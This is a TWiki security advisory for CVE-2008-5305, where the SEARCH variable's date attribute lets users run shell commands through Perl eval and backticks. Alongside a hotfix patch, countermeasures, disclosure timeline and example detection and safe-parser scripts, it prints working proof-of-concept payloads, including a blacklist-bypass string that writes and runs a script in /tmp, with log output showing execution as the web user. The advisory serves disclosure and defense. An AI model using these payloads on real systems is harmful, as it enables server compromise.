NOTE: The security alert sent out on 2009-04-29 contained an incorrect link to this old CVE. Please visit SecurityAlert-CVE-2009-1339 for information on, and to give feedback on, CVE-2009-1339 - CSRF Vulnerability with Image Tag.




Security Alert: TWiki SEARCH variable allows arbitrary shell command execution

Get Alerted: To get immediate alerts of high priority security issues, please join the low-volume twiki-announce list - details at TWikiAnnounceMailingList

This advisory alerts you of a potential security issue with your TWiki installation: The %SEARCH{}% TWiki variable allows arbitrary shell command execution. (See also unrelated SecurityAlert-CVE-2008-5304 - Cross-site scripting vulnerability with TWiki URLPARAM variable.)

Vulnerable Software Version

Attack Vectors

Editing wiki pages, and HTTP GET requests to the wiki server (typically port 80/TCP). Typically, prior authentication is necessary (an anonymous TWikiGuest account counts as authenticated).

Impact

An unauthenticated remote attacker can execute arbitrary shell and/or perl commands as the webserver user, such as user nobody.

Severity Level

The TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess and assigned the following severity level:

  • Severity 1 issue: The web server can be compromised

MITRE Name for this Vulnerability

The Common Vulnerabilities and Exposures project has assigned the name CVE-2008-5305 to this vulnerability.

Details

The %SEARCH{}% TWiki variable, or a specially crafted GET URL, lets a malicious user compose a command line that is executed by the Perl backtick (``) operator: user input is passed to Perl's "eval" without first being sanitized.

If access to TWiki is not restricted by other means, attackers can use the SEARCH variable with or without prior authentication, depending on the configuration.

Proof of concept:

  • Enter the following in the search box:
    %SEARCH{ date="P`pr -?`" search="xyzzy" }%

  • Or use a GET URL like:
    http://example.org/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all

Afterwards, evidence of command execution can be seen in the webserver's error_log:

[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] pr: invalid option -- ?
[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] Try `pr --help' for more information.
[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] [Thu Sep 11 22:13:36 2008] view: Use of uninitialized value in concatenation (.) or string at /var/www/twiki/lib/TWiki/Time.pm line 441.
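The GET vector above leaves a recognisable trace in the web server's access log as well: the search parameter URL-decodes to a %SEARCH{}% variable whose date attribute carries a backtick. The following Perl script is an added example, not part of the advisory or of TWiki, that flags such requests. The log entries are constructed (the first reuses the URL quoted above), and the function names are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Minimal URL decoder (no CPAN modules needed): '+' -> space, %XX -> byte.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Returns 1 if the request line carries a query parameter that decodes to a
# %SEARCH{...}% variable whose date="..." attribute contains a backtick.
sub suspicious_search_request {
    my ($request_line) = @_;
    return 0 unless $request_line =~ m{\A(?:GET|POST)\s+\S*?\?(\S+)};
    my $query = $1;
    for my $pair (split /&/, $query) {
        my (undef, $value) = split /=/, $pair, 2;
        next unless defined $value;
        $value = url_decode($value);
        return 1 if $value =~ /%SEARCH\{[^}]*\bdate\s*=\s*"[^"]*`/i;
    }
    return 0;
}

# Pull the quoted request line out of an Apache combined-format log entry.
sub request_line_from_log {
    my ($entry) = @_;
    my ($req) = $entry =~ /"([^"]*)"/;
    return defined $req ? $req : '';
}

# Constructed sample entries: the first reuses the GET URL quoted in the
# advisory; the second is an ordinary search for comparison.
my @log_entries = (
    '127.0.0.1 - - [11/Sep/2008:22:13:36 +0200] "GET /twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all HTTP/1.1" 200 4211',
    '127.0.0.1 - - [11/Sep/2008:22:15:02 +0200] "GET /twiki/bin/view/Main/WebSearch?search=xyzzy&scope=all HTTP/1.1" 200 3980',
);

for my $entry (@log_entries) {
    my $req = request_line_from_log($entry);
    printf "%s  %s\n", suspicious_search_request($req) ? 'ALERT ' : 'ok    ', $req;
}
```

The decoder runs exactly once, which is how the CGI layer sees the parameter; the check looks at the decoded value rather than at the raw URL so that different encodings of the same payload are treated alike. Run it over a real access log with one entry per line and review the lines marked ALERT alongside the error_log excerpt shown above.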

Arbitrary code execution is made tedious by the following restrictions on the date value:

  • forward slashes are not allowed
  • the characters y, m, w, d, h and s (upper- or lowercase) are not allowed
  • backslashes are escaped ('\' -> '\\')

An attacker may be able to circumvent this blacklist by uploading a file to a directory listed in $PATH and then executing it similar to the "pr" example above.

An attacker could also find a transform that bypasses the disallowed characters: a combination of Perl variables and shell globbing can be used to overcome the blacklist. The following example uses Perl's tr operator to generate the blocked characters. Once the Perl variables exist, they are used to assemble shell commands that are written to "/tmp/x", which is then executed (its output is redirected to stderr so that it appears in the error_log).

# A = m, B = y, C = s, E = d, F = h, G = w, X = /
%SEARCH{date="Pour $X='X';$X=~tr#X#\057#;our $A='X';$A=~tr#X#\155#;our %$B='X';$B=~tr#X#\171#;our $C='X';$C=~tr#X#\163#;our %$E='X';$E=~tr#X#\144#;our $F='X';$F=~tr#X#\150#;our %$G='X';$G=~tr#X#\167#;`ec${F}o ${X}u${C}r${X}bin${X}i${E} > %${X}t${A}p${X}x;c${F}${A}o${E} +x ${X}t${A}p${X}x;${X}t${A}p${X}x %>&2;`" search="xyzzy"}%}

Here's the output in the error_log:

[Fri Sep 12 01:13:21 2008] [error] [client 127.0.0.1] uid=81(apache) gid=81(apache) groups=81(apache)

Countermeasures

  • Apply hotfix (see patch below).
  • Upgrade to the latest patched production TWiki-4.2.4, TWikiRelease04x02x04.
  • Use the web server software to restrict access to the web pages served by TWiki.
  • The {SafeEnvPath} configure setting can be used to restrict the possible directories that are searched for executables. By default, this is the PATH used by the webserver user. Set {SafeEnvPath} to a list of non-writable directories, such as "/bin:/usr/bin".
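To make the countermeasure concrete, here is an added Perl example, not TWiki code and not the hotfix itself, that contrasts the hotfix's approach (strip everything that is not arithmetic, then eval) with a parser that computes the duration without calling eval at all. The unit expansion, the 30-day month and the case-insensitive unit letters are assumptions of this example, and the function names are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Seconds per duration unit. The 30-day month and the case-insensitive
# handling of the unit letters are assumptions of this example.
my %UNIT_SECONDS = (
    y => 365 * 24 * 3600,
    m =>  30 * 24 * 3600,
    w =>   7 * 24 * 3600,
    d =>       24 * 3600,
    h =>            3600,
    s =>               1,
);

# Rewrite "2w3d" into "2*604800+3*86400+0", the kind of arithmetic string
# the vulnerable code handed straight to eval.
sub expand_units {
    my ($body) = @_;
    for my $unit (qw(y m w d h s)) {
        $body =~ s/$unit/*$UNIT_SECONDS{$unit}+/gi;
    }
    $body =~ s/\+\z/+0/;    # close a trailing '+' with a zero
    return $body;
}

# Approach 1, what the hotfix does: drop every character that is not part
# of an arithmetic expression, then evaluate what is left.
sub eval_filtered {
    my ($expr) = @_;
    $expr =~ s#[^-\d+*/()]##g;
    my $value = eval($expr);
    return undef if !defined $value || $@;
    return $value;
}

# Approach 2, stricter: never call eval. Accept only an anchored
# "P<digits><unit>..." shape and add the seconds up directly.
sub duration_to_seconds {
    my ($spec) = @_;
    return undef unless defined $spec && $spec =~ /\AP((?:\d+[ymwdhs])+)\z/i;
    my ($body, $total) = ($1, 0);
    while ($body =~ /(\d+)([ymwdhs])/gi) {
        $total += $1 * $UNIT_SECONDS{ lc $2 };
    }
    return $total;
}

# Run both on a benign duration and on the advisory's proof-of-concept value.
for my $input ('P2w3d', 'P`pr -?`') {
    (my $body = $input) =~ s/\AP//;
    my $filtered = eval_filtered(expand_units($body));
    my $parsed   = duration_to_seconds($input);
    printf "%-10s filtered eval: %-10s  no-eval parser: %s\n", $input,
        defined $filtered ? $filtered : 'error',
        defined $parsed   ? $parsed   : 'rejected';
}
```

For P2w3d both paths agree (1468800 seconds); for the proof-of-concept value the filter reduces the string to a lone minus sign, eval fails, and the parser rejects the input outright. Approach 1 still evaluates a string, so its safety depends entirely on the character allowlist being complete; approach 2 has no evaluation step to protect, which is why a parser is the preferable long-term fix even after the hotfix is applied.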

Authors and Credits

Hotfix for TWiki Production Release 4.2.x

Affected file: twiki/lib/TWiki/Time.pm

Patch:

--- twiki/branches/TWikiRelease04x02/lib/TWiki/Time.pm
+++ twiki/branches/TWikiRelease04x02/lib/TWiki/Time.pm
@@ -431,13 +431,16 @@
        $ends[$i] =~ s/S/\*1\+/gi;
        #   possibly append '0' and evaluate numerically the string.  
        $ends[$i] =~ s/\+$/+0/;
-        my $duration = eval($ends[$i]);
+        $ends[$i] =~ s#[^-\d+*/]##g;
+        my $duration = eval( $ends[$i] );
        #   the value computed, if it specifies the starting point
        #   in time, must be subtracted from the previously
        #   computed ending point.  if it specifies the ending
        #   point, it must be added to the previously computed
        #   starting point.
-        $ends[$i] = eval($ends[1-$i].$oper[$i].$ends[$i]);
+        my $expr = "$ends[1-$i]$oper[$i]($ends[$i])";
+        $expr =~ s#[^-\d+*/()]##g;
+        $ends[$i] = eval( $expr );
        # SMELL: if the user specified both start and end as a
        # time duration, some kind of error must be reported.
    }
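Review bot: the first added line, `$ends[$i] =~ s#[^-\d+*/]##g;`, silently deletes unexpected characters instead of rejecting the input, so a malformed duration degrades to whatever digits and operators remain and is still handed to eval; returning an error when `$ends[$i] !~ /\A[-\d+*\/]+\z/` would surface the bad input to the user and is the same check with a clearer failure mode. The filter on `$expr` has the same shape and the same remedy. Neither `eval( $ends[$i] )` nor `eval( $expr )` inspects `$@` afterwards, so a syntax error from a stripped-down expression becomes an undef value rather than an explicit error; a `return undef if $@;` after each eval, or a single error path for both, would make the failure visible.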

Hotfix for older affected TWiki Releases

Apply above patch (line numbers may vary).

Action Plan with Timeline

| # | Action | Date / Deadline | Status | Who |
| 1 | User discloses issue to TWikiSecurityMailingList | 2008-11-21 | Done | Peter Allor |
| 2 | Developer verifies issue | 2008-12-01 | Done | Crawford Currie |
| 3 | Developer fixes code | 2008-12-01 to 03 | Done | Crawford Currie, Sopan Shewale |
| 4 | Security team creates advisory with hotfix | 2008-12-03 | Done | Troy Bollinger, Peter Thoeny |
| 5 | Send alert to TWikiAnnounceMailingList and TWikiDevMailingList | 2008-12-03 | Done | Peter Thoeny |
| 6 | Publish advisory in Codev web and update all related topics | 2008-12-05 | Done | Peter Thoeny |
| 7 | Issue a public security advisory (vuln@secunia.com, cert@cert.org, bugs@securitytracker.com, full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org) | 2008-12-05 | Done | Peter Thoeny |

External Links

-- PeterThoeny - 03 Dec 2008

Discussions

Topic revision: r10 - 2009-04-30 - PeterThoeny